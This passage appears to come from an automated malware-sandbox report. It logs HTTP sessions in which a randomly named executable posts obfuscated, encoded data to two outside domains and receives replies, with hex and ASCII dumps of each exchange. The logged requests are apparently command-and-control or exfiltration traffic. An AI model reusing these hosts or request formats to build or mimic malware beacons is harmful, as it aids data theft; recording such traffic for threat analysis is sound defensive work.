                                                                              Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                              Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chro
                                                                              Dec 2, 2024 14:44:33.346962929 CET102INData Raw: 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72
                                                                              Data Ascii: me friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.10499673.33.130.190806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:39.001931906 CET643OUTPOST /8m07/ HTTP/1.1
                                                                              Host: www.goldstarfootwear.shop
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.goldstarfootwear.shop
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.goldstarfootwear.shop/8m07/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 70 6a 46 4e 78 44 50 73 76 71 2f 54 74 6e 2f 76 71 58 52 64 72 6b 33 52 50 4b 4e 49 58 73 6c 44 6f 70 6c 67 5a 73 36 55 59 44 35 6a 6c 31 5a 31 51 50 63 2b 7a 77 5a 4d 38 37 34 41 52 77 76 77 74 4d 4d 48 54 72 2f 61 51 49 50 6d 38 62 56 6c 5a 31 31 4e 45 2b 33 4d 43 33 51 4d 7a 44 66 6b 45 5a 65 57 44 77 75 36 62 54 36 4c 35 49 30 4e 36 6a 6c 66 68 55 68 6f 62 43 74 32 78 67 32 67 4f 79 58 6c 56 74 47 6f 62 52 48 4d 30 4f 4c 79 6c 51 41 2f 69 4f 56 77 4c 37 36 66 54 75 6d 6c 50 67 6d 6d 34 4b 35 4a 4a 55 75 53 79 74 6d 34
                                                                              Data Ascii: 6NVpdLF=7fvor6a+xd+5pjFNxDPsvq/Ttn/vqXRdrk3RPKNIXslDoplgZs6UYD5jl1Z1QPc+zwZM874ARwvwtMMHTr/aQIPm8bVlZ11NE+3MC3QMzDfkEZeWDwu6bT6L5I0N6jlfhUhobCt2xg2gOyXlVtGobRHM0OLylQA/iOVwL76fTumlPgmm4K5JJUuSytm4


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.10499743.33.130.190806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:41.690571070 CET667OUTPOST /8m07/ HTTP/1.1
                                                                              Host: www.goldstarfootwear.shop
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.goldstarfootwear.shop
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.goldstarfootwear.shop/8m07/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 76 44 56 4e 7a 6b 37 73 37 36 2f 63 78 58 2f 76 6a 33 52 42 72 6b 37 52 50 4f 55 54 58 65 52 44 6f 49 56 67 66 64 36 55 49 54 35 6a 74 56 5a 77 55 50 63 44 7a 77 64 79 38 36 45 41 52 77 72 77 74 4e 38 48 54 34 48 56 51 59 50 6b 30 37 56 6e 57 56 31 4e 45 2b 33 4d 43 33 46 70 7a 44 48 6b 45 70 75 57 43 56 4f 35 57 7a 36 4b 6f 49 30 4e 70 7a 6c 54 68 55 67 4e 62 44 77 6a 78 6d 36 67 4f 7a 6e 6c 4d 63 47 72 56 68 48 43 33 2b 4b 64 75 46 68 6f 6b 50 45 58 55 6f 71 72 42 34 47 61 49 42 62 68 70 62 59 65 61 6a 79 63 38 72 54 53 32 77 68 38 48 49 4a 49 65 67 39 51 4d 45 71 59 4f 41 73 45 4f 67 3d 3d
                                                                              Data Ascii: 6NVpdLF=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeRDoIVgfd6UIT5jtVZwUPcDzwdy86EARwrwtN8HT4HVQYPk07VnWV1NE+3MC3FpzDHkEpuWCVO5Wz6KoI0NpzlThUgNbDwjxm6gOznlMcGrVhHC3+KduFhokPEXUoqrB4GaIBbhpbYeajyc8rTS2wh8HIJIeg9QMEqYOAsEOg==


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.10499813.33.130.190806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:44.355114937 CET1680OUTPOST /8m07/ HTTP/1.1
                                                                              Host: www.goldstarfootwear.shop
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.goldstarfootwear.shop
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.goldstarfootwear.shop/8m07/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 76 44 56 4e 7a 6b 37 73 37 36 2f 63 78 58 2f 76 6a 33 52 42 72 6b 37 52 50 4f 55 54 58 65 4a 44 6f 61 4e 67 63 2b 53 55 61 44 35 6a 6a 31 5a 78 55 50 63 53 7a 77 6c 32 38 36 49 71 52 79 44 77 74 76 45 48 47 35 48 56 65 59 50 6b 34 62 56 6d 5a 31 31 59 45 39 4f 46 43 33 56 70 7a 44 48 6b 45 71 32 57 4c 67 75 35 46 6a 36 4c 35 49 30 6f 36 6a 6b 47 68 51 4e 77 62 44 6c 59 78 57 61 67 4f 51 66 6c 4f 4f 65 72 54 78 48 41 2b 75 4b 46 75 46 6b 76 6b 4c 6c 35 55 70 75 56 42 2f 79 61 4b 67 32 68 72 70 73 44 42 79 36 63 33 37 48 71 35 47 5a 56 4b 35 63 32 57 79 46 6b 5a 77 72 39 41 68 4d 49 64 68 39 2b 70 69 71 79 6c 50 44 62 58 44 70 74 72 36 74 46 31 54 70 50 37 57 37 6f 75 78 63 58 79 5a 6e 4e 63 4e 51 41 6b 2b 52 35 67 69 45 77 54 4b 69 4b 57 43 45 37 56 57 6c 68 52 79 47 4d 75 56 6b 54 67 64 30 53 58 45 33 2b 57 4a 35 39 6c 72 67 36 48 42 4b 6b 33 78 32 4d 7a 68 61 48 63 79 67 50 57 69 4f 44 4c 55 59 72 42 43 44 34 78 52 79 44 75 76 62 48 30 76 [TRUNCATED]
                                                                              Data Ascii: 6NVpdLF=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeJDoaNgc+SUaD5jj1ZxUPcSzwl286IqRyDwtvEHG5HVeYPk4bVmZ11YE9OFC3VpzDHkEq2WLgu5Fj6L5I0o6jkGhQNwbDlYxWagOQflOOerTxHA+uKFuFkvkLl5UpuVB/yaKg2hrpsDBy6c37Hq5GZVK5c2WyFkZwr9AhMIdh9+piqylPDbXDptr6tF1TpP7W7ouxcXyZnNcNQAk+R5giEwTKiKWCE7VWlhRyGMuVkTgd0SXE3+WJ59lrg6HBKk3x2MzhaHcygPWiODLUYrBCD4xRyDuvbH0vB3gFPmzp6BvBKNq2htH0szSm9kR6nDs5yuIrrMbb+RYd7wvrktRVZGD2ELuf6VcmAyw4KH3UvrsytB4nzalTf3n2r/ZLusL7CQtmw4Fck5zYFR9wDdGWkMNDED+V58DFGHAOhU1AzM6iFAdDBn+5lbWcJF4L6WMGxQOP24b1/JLhELaO4r+pXwUh3E3Np7pUDjJp3pSUNmcYV+EzR0wvMPck0ohSkZVfhlv+LWpe8OiLlig8p4khPSZomaN21pLqS83mZD8gbNAq8UAjx1oE40+PTlYU66KrPWrH15ugRgm8iFDrvXnb4pmY7KjY5mZyjZ+YKKvSkldvUumDqFoMec59DlGNk8Ewyk2ytyxmr4ZZdaLzFghT+6dBERIrtJ8OCx4VJZlBntOEfnbGbr1cvRo3cS8x6BhU1Es6m9GX3OtynrSt7cPjWznsXpsDbpcH+EUMGWnQDbCvead/Q/bXQuF1r5G5K8mo2BKEndWx/IATT6S/RIa+f9WaGofKUVetnaIM2zJ6l4sXsjFNeuV5wVqwBPdWIPRQQ+e55XvNcSXx2p7/kqPWUQD3xos5x+TPtb4+Qf3e4I/OatMK7yvm6TQjT8eQiD67Pt8R4LVyaGqj0Zq0cd7l2ueZRabGJ/VKdWsMRk7PmqS0H6pwGsGaigKyuitX2JaoOK [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.10499883.33.130.190806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:47.015214920 CET364OUTGET /8m07/?6NVpdLF=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrWZvRz659dWh9F4TBV1031x6bEqu3dQ==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.goldstarfootwear.shop
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:44:48.194793940 CET394INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Mon, 02 Dec 2024 13:44:48 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 254
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 4e 56 70 64 4c 46 3d 32 64 48 49 6f 50 53 2f 38 75 53 6d 6e 30 55 51 77 42 58 76 6b 5a 37 46 73 69 4b 78 39 55 64 76 33 6c 58 70 47 2b 5a 37 5a 66 52 33 2f 72 31 4d 41 36 79 66 61 53 45 75 75 58 31 67 63 50 74 75 30 48 70 6c 78 4b 55 48 42 77 2b 53 72 4f 51 4b 4d 4a 72 72 57 5a 76 52 7a 36 35 39 64 57 68 39 46 34 54 42 56 31 30 33 31 78 36 62 45 71 75 33 64 51 3d 3d 26 5f 6a 56 78 3d 72 6c 56 30 5f 54 51 38 31 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6NVpdLF=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrWZvRz659dWh9F4TBV1031x6bEqu3dQ==&_jVx=rlV0_TQ81"}</script></head></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.1049994161.97.142.144806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:53.878459930 CET619OUTPOST /6m2n/ HTTP/1.1
                                                                              Host: www.070002018.xyz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.070002018.xyz
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.070002018.xyz/6m2n/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 56 79 52 37 78 45 69 51 41 42 6b 6f 30 56 42 6f 55 6a 79 69 75 34 37 4d 58 73 33 74 42 36 48 73 4e 72 38 4f 67 39 54 6f 79 48 72 47 36 6e 4d 6f 36 2f 61 65 75 76 56 39 4b 59 64 4e 2f 58 64 42 4d 5a 32 73 4c 74 53 72 63 72 55 37 75 4f 48 37 51 6d 39 37 2f 59 64 65 2b 56 45 59 50 54 55 64 37 46 4e 4b 76 59 64 43 31 35 4c 48 65 75 68 4c 70 50 46 6c 45 72 57 73 6d 52 48 57 4e 36 2f 5a 35 31 66 7a 6e 74 2b 66 47 5a 4a 4e 64 79 47 56 4c 6d 57 2b 52 69 35 6b 62 64 79 44 75 79 78 39 39 6d 59 66 39 43 38 71 6e 78 6f 79 4b 4f 31 67 76 49 4d 2f 59 47 67 77 47 44 50 51
                                                                              Data Ascii: 6NVpdLF=VyR7xEiQABko0VBoUjyiu47MXs3tB6HsNr8Og9ToyHrG6nMo6/aeuvV9KYdN/XdBMZ2sLtSrcrU7uOH7Qm97/Yde+VEYPTUd7FNKvYdC15LHeuhLpPFlErWsmRHWN6/Z51fznt+fGZJNdyGVLmW+Ri5kbdyDuyx99mYf9C8qnxoyKO1gvIM/YGgwGDPQ
                                                                              Dec 2, 2024 14:44:55.102485895 CET1236INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:44:54 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              ETag: W/"66cce1df-b96"
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                              Dec 2, 2024 14:44:55.102509975 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.1049995161.97.142.144806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:56.539814949 CET643OUTPOST /6m2n/ HTTP/1.1
                                                                              Host: www.070002018.xyz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.070002018.xyz
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.070002018.xyz/6m2n/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 56 79 52 37 78 45 69 51 41 42 6b 6f 30 30 78 6f 52 41 61 69 2f 49 37 4e 59 4d 33 74 59 71 47 6e 4e 72 77 4f 67 38 6d 76 79 30 50 47 30 6c 55 6f 37 39 2b 65 2b 2f 56 39 43 34 63 46 79 33 64 65 4d 5a 79 65 4c 70 61 72 63 72 41 37 75 4b 44 37 52 51 31 34 35 59 64 59 6e 46 45 61 4c 54 55 64 37 46 4e 4b 76 59 4a 37 31 39 6e 48 5a 64 35 4c 6f 75 46 6d 4e 4c 57 72 6e 52 48 57 4a 36 2b 65 35 31 66 52 6e 6f 66 36 47 62 78 4e 64 7a 32 56 4c 53 4b 68 59 69 35 69 47 4e 7a 4c 6f 53 6f 4a 39 6d 38 37 77 30 67 71 37 54 38 41 45 50 49 6e 2b 5a 74 6f 4c 78 38 2b 49 46 36 36 6a 6d 54 47 73 6e 5a 49 5a 6a 72 50 5a 41 63 49 34 42 79 6d 57 41 3d 3d
                                                                              Data Ascii: 6NVpdLF=VyR7xEiQABko00xoRAai/I7NYM3tYqGnNrwOg8mvy0PG0lUo79+e+/V9C4cFy3deMZyeLparcrA7uKD7RQ145YdYnFEaLTUd7FNKvYJ719nHZd5LouFmNLWrnRHWJ6+e51fRnof6GbxNdz2VLSKhYi5iGNzLoSoJ9m87w0gq7T8AEPIn+ZtoLx8+IF66jmTGsnZIZjrPZAcI4BymWA==
                                                                              Dec 2, 2024 14:44:57.858855009 CET1236INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:44:57 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              ETag: W/"66cce1df-b96"
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                              Dec 2, 2024 14:44:57.858875036 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.1049996161.97.142.144806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:59.225997925 CET1656OUTPOST /6m2n/ HTTP/1.1
                                                                              Host: www.070002018.xyz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.070002018.xyz
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.070002018.xyz/6m2n/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 56 79 52 37 78 45 69 51 41 42 6b 6f 30 30 78 6f 52 41 61 69 2f 49 37 4e 59 4d 33 74 59 71 47 6e 4e 72 77 4f 67 38 6d 76 79 30 48 47 30 55 30 6f 36 64 43 65 73 76 56 39 49 59 63 47 79 33 63 43 4d 64 65 61 4c 70 57 64 63 70 34 37 6f 66 58 37 59 46 56 34 73 6f 64 59 6f 6c 45 66 50 54 55 4d 37 46 39 4f 76 59 5a 37 31 39 6e 48 5a 63 4a 4c 75 2f 46 6d 4c 4c 57 73 6d 52 48 4b 4e 36 2f 35 35 31 47 75 6e 6f 72 41 48 71 52 4e 64 54 6d 56 59 52 69 68 46 53 35 67 48 4e 7a 36 6f 53 55 57 39 6d 67 33 77 30 38 41 37 52 38 41 48 2b 35 38 74 34 5a 46 5a 6a 5a 72 41 33 71 39 6b 77 54 55 73 30 6b 54 64 78 43 54 44 54 4e 6e 31 43 50 63 4a 46 49 79 65 78 6e 58 49 48 6a 6d 72 31 4b 6f 77 68 42 4b 43 69 56 7a 6a 2b 58 42 33 33 79 57 36 47 6c 30 43 59 63 76 31 37 69 76 35 65 33 48 36 58 66 4a 55 6b 6c 51 30 57 4f 64 37 31 46 79 74 6e 5a 73 32 6e 5a 42 64 4b 57 49 42 72 4f 58 31 36 68 46 77 54 67 43 58 4a 30 49 52 6e 76 4a 54 48 52 31 4d 77 62 41 2f 58 5a 41 4b 4d 4a 78 55 36 49 5a 46 7a 46 45 4e 55 [TRUNCATED]
